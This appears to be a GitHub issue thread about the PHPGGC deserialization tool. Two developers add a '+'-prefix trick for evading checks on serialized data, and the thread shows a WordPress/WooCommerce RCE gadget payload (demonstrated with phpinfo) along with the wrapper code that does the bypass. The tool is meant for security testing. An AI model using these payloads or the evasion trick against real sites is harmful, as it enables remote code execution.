Wrapper to bypass checks as enhancement ?

[erwanlr]

There is a trick which can be used to bypass some attempts to validate the serialised data given: Put a + before all integer values of Object and/or Classes (there might be also possible for integer and string, haven't checked).

For instance:

O:19:"WC_Log_Handler_File":1:{s:10:"*handles";C:33:"Requests_Utility_FilteredIterator":80:{x:i:0;a:1:{i:0;s:7:"phpinfo";};m:a:1:{s:11:"*callback";s:14:"call_user_func";}}}

would become

O:+19:"WC_Log_Handler_File":1:{s:10:"*handles";C:+33:"Requests_Utility_FilteredIterator":80:{x:i:0;a:1:{i:0;s:7:"phpinfo";};m:a:1:{s:11:"*callback";s:14:"call_user_func";}}}

So far I am using a wrapper as this is a very specific situation to bypass the check in place:

public function process_serialized($serialized) {
    return preg_replace('/(C|O):(\d+):/', '$1:+$2:', $serialized);
}

However, it might be interesting to add it as an enhancement

[cfreal]

Cool idea. I'll implement it soon.

[cfreal]

Added -n --plus-numbers. Handles Object, String, Ints, etc.

[erwanlr]

Great :)

However, it seems that only Object and Class are allowed to have the + sign, otherwise an unserialize(): Error at offset is raised when present for String and Integer.

So the function should be

public function process_serialized($serialized)
    {
        return preg_replace(
            '#\b([CO]):+?(\d+):(".*?"):+?(\d+):{#',
            '$1:+$2:$3:+$4:{',
            $serialized
        );
    }

[cfreal]

I beg to differ:
http://sandbox.onlinephpfunctions.com/code/8716030d66de092d866dab8d7fd722c7068fc7df
Since PHP7.2 though, O and s/S cannot have a +:

php > print phpversion();
7.2.17-1+ubuntu16.04.1+deb.sury.org+1
php > print unserialize('s:+3:"abc";');
PHP Notice:  unserialize(): Error at offset 0 of 10 bytes in php shell code on line 1

[erwanlr]

Humm, it doesn't make it easy to use the -n then :/. Could it be possible to pass an argument to the -n, such as -n O to process only the objects (and maybe -n 'O|C' for Objects and Class for example) ?. If it's too complicated, don't bother, wrapper inside the chain.php directly or via -w does the job.

Using PHP 7.1 (7.1.23 locally and 7.1.0 from the online shell), below were my tests (not sure if there is a generation error from the tool or another shenanigan as in my case only Object and Class can have the + when unserialized):

• http://sandbox.onlinephpfunctions.com/code/1a47d388b1bb325b3a4eb0b85a60ef182f9afcac (payload is ./phpggc WordPress/WooCommerce/RCE1 call_user_func phpinfo -n -b), will generate <b>Notice</b>: unserialize(): Error at offset 179 of 185 bytes in <b>[...][...]</b> on line <b>2</b><br />
• http://sandbox.onlinephpfunctions.com/code/357bde9cbb2c168473d526cf5f37065288be6116 (payload is the same as above but with the process_serialized modified from my previous post, ie only O and C are processed) - no offset error

[erwanlr]

I found the issue.

When there is serialized class (C), its length would need to be updated if there are any + sign being added inside.

Example:

chain.php

<?php

namespace GadgetChain\WordPress\NumberIssue;

class RCE1 extends \PHPGGC\GadgetChain\RCE {
    public function generate(array $parameters) {
        return new \Custom_Iterator;
    }
}

gadgets.php

<?php

class Custom_Iterator Extends ArrayIterator {
    public $callback = 'test';
}

./phpggc WordPress/NumberIssue/RCE1 a b
C:15:"Custom_Iterator":47:{x:i:0;a:0:{};m:a:1:{s:8:"callback";s:4:"test";}}

$ ./phpggc WordPress/NumberIssue/RCE1 a b -n
C:+15:"Custom_Iterator":+47:{x:i:+0;a:0:{};m:a:1:{s:+8:"callback";s:+4:"test";}}

Here the +47 is wrong and should be +50 (as 3 + have been added) - http://sandbox.onlinephpfunctions.com/code/4cc5bb949755429900a0c10562b58136cff65626

[cfreal]

Haha was just writing about this as well. Well, this is annoying, because this means parsing the serialized string. If for instance there is a serialized string inside a serialized string, this problem will happen as well (as the size of the string will change). For now, I'll do as you said, and change the --plus-numbers option to a parameter: ./phpggc ... -n CO in your case.

[cfreal]

Try now and tell me :)

[erwanlr]

Seems good, thank you!